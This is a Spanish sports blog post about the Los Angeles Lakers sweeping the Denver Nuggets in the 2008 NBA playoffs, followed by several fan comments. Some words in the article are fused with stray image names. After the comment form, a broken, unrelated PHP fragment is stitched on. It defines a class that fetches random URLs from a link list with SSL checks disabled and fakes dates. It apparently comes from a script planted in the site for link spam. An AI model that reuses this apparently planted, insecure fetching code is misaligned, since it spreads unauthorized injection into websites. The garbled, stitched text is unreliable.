Los Lakers barren sin forzar la máquina

29 de April de 2008 por TheDeerHunter

lakersrocky

Por la vía rápida. Los Lakers no vencían una eliminatoria por 4-0 desde las Finales de 2002 ante los Nets. El equipo angelino ha sido el único en barrer a su rival en esta primera ronda de los Playoffs, algo que consiguió anoche en Denver en el partido más igualado de toda la eliminatoria.

Los Nuggets ofrecieron la imagen más digna que les hemos podido ver en su enfrentamiento ante los Lakers, algo que sin embargo resultó insuficiente ante la mayor solidez del equipo dirigido por Phil Jackson, con mayor variedad de recursos y las ideas mucho más claras.

Desgranemos cuáles han sido las claves del contundente triunfo de los Lakers y del fracaso (nuevo fracaso) para los de Colorado.

Ya desde el principio de temporada se especulaba con el posible carácter imprevisible de un equipo que cuenta en sus filas con dos de las primeras espadas de la liga, Iverson y Melo, y de cómo podían interactuar entre ellos y con el resto del equipo. Era un equipo, visto desde la perspectiva de entonces, diseñado para buscar incluso la parte alta del cuadro del Oeste y, si acaso, convertirse en uno de los gallos de lanuggfan competición. Contaba (y cuenta) en sus filas con jugadores de cierto prestigio como Marcus Camby, J.R. Smith, Kenyon Martin, Kleiza, Chucky Atkins, Nené…

Denver se ha movido durante toda la temporada entre la voracidad anotadora de sus dos estrellas (3º y 4º máximos anotadores este año) y una ausencia alarmante de sistemas de juego, tanto ofensivos como defensivos, dando constantemente una sensación de improvisación y de falta de madurez/preparación como equipo.

Su imagen mejoró ligeramente al mostrar una competitividad incuestionable en el último tramo de la temporada, cuando lograron alcanzar las 50 victorias, se ganaron un puesto en el ultra-exigente Wild Wild West a costa de uno de los equipos con solera de esta temporada, Golden State. Durante este último tramo, si bien no se notaron grandes avances colectivos sí se ascendió un peldaño en la implicación individual de ciertos jugadores, como JR Smith o Kenyon Martin.

Con los Lakers, por contra, apenas se contaba en los pronósticos iniciales pero desde un principio se notaron importantes mejoras en las prestaciones de una plantilla a priori limitada y se vio a un Kobe asombrosamente más implicado con el proyecto colectivo. Situados toda la temporada en la parte alta del lakersgangcuadro y jugando muy bien se realizaron importantes y acertados movimientos en la plantilla que se culminaron en la, por todos conocida, adquisición de Gasol (también motivada por la nefasta lesión de uno de los pilares fundamentales del equipo: Andrew Bynum), un movimiento que de inmediato elevó las perspectivas del equipo.

A pesar de lograr de forma brillante la primera plaza del Oeste, ciertas dudas quedaban como poso en la retina de los aficionados, en especial las confirmadas ausencias de Bynum y de Ariza, con las importantes consecuencias negativas que esto supone para la defensa amarilla; también el rendimiento de Gasol en Playoffs, en un equipo nuevo para él; el rendimiento de Kobe en un equipo con distinta filosofía al de los últimos años; y la falta de control del juego en puntuales derrotas contra equipos inferiores durante el tramo decisivo de la temporada así como los problemas de disponibilidad de sus jugadores altos.

melofouledoutEn este punto, todos los análisis inmediatos a Playoffs (aqui y aquí) fueron en la línea de otorgar el favoritismo a Lakers siempre y cuando fueran capaces de controlar el imprevisible juego de los Nuggets.

La eliminatoria ha ido casi de forma exacta por esos derroteros, con la salvedad de que ha sido más cómoda para Lakers de lo esperado pues Denver, casi por sí solos, han bajado sus prestaciones individuales sin apenas exigir un esfuerzo especial por parte de su rival.

Ya en los días previos a la eliminatoria saltaba la noticia de la detención de Carmelo por exceso de alcohol al volante. Durante la misma les ha pasado factura a él individualmente, mostrándose más descentrado e impreciso de lo habitual (ha bajado de casi un 50% en tiro al 30%), y ha favorecido que el resto del equipo se vea envuelto en un clima enrarecido e insolidario que George Karl no ha sido capaz de revertir.

Probablemente no lo hubieran logrado de todas formas, pues los Lakers han mostrado momentos de brillantez, sobre todo ofensiva, de la mayoría de jugadores. En especial Kobe Bryant que ha tenido momentos de completa genialidad, precisamente aquellos en los que Denver puso más carne en el asador. Cada intento más o menos inspirado de los Nuggets de crear problemas a los Lakers fue abortado, uno tras otro, por el 24. Bryant dominókobefly en todos los aspectos el segundo encuentro de la serie y anoche ofreció una demostración de cómo cerrar un partido que estaba empatado a cinco minutos para el final con una exhibición de canastas de todo tipo.

Los Lakers se han limitado, en general, a bajar ligeramente el ritmo de los partidos, explotar su magnífico juego de pase (la aparición de Luke Walton resulta esencial en este aspecto) y dejar que Denver se estrellara en su propia ineficacia. Es previsible que los próximos rivales se lo pondrán algo más difícil que Nuggets pero no hay que restar valor al éxito del conjunto californiano, que se ha convertido en el primero en toda la historia que barre en primera ronda a un equipo con más de 50 triunfos en regular season. Así, con la satisfacción que produce el trabajo bien hecho, los Lakers ya esperan a Jazz o Rockets, que esta próxima noche disputarán el 5º partido de la serie con ventaja (3-1) para los de Salt Lake City.

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Buena imagen la que han ofrecido los Lakers durante toda la serie. Lo mejor, creo yo, es que no ha dado la sensación de que hayan necesitado dar lo mejor de sí y que les queda margen de mejora. Siempre que lo han necesitado, han aumentado la marcha y eso tiene mérito. También tiene mérito hacer que un equipo que ha ganado 50 partidos parezca tan mediocre.

    Venga, a por los Jazz… imagino.

      Citar

  2. Gallis dice:
    #2

    Yo es que tras esta serie ni soy más optimista ni soy más pesimista. Creo que los Playoff empiezan ahora. Lo mejor, para mí, no haberla cagado. Perder un solo partido habría sido un signo de debilidad. Anoche por fin pareció un partido de Playoff en la segunda parte, y el equipo respondió. Además, estoy convencido de que el nivel defensivo del equipo subirá contra los Jazz, porque si no sufriremos mucho.

    Otra cosa que habrá que comprobar es si el renacimiento de Walton es real o no…si lo es, es un arma con el que nadie contabamos y que a mí particularmente me da esperanzas…

    Los pronósticos y esas cosas las dejo para cuando se confirme que son los Jazz…

      Citar

  3. Viva_Dirk dice:
    #3

    Solo me queda añadir ¡¡¡¡¡Go Lakers Go!!!!!

      Citar

  4. TheDeerHunter dice:
    #4

    En efecto,
    pero yo no diría que de los candidatos al anillo Lakers se hayan enfrentado al equipo más flojo (aunque ellos se hayan empeñado en demostrar lo contrario)

    Otros hay bastante flojos y nadie ha conseguido un 4-0 (de hecho alguno se las está viendo mucho más chungo de lo esperado)

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    A mí me queda añadir,,y ¿qué hay de mi Ira Newble?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>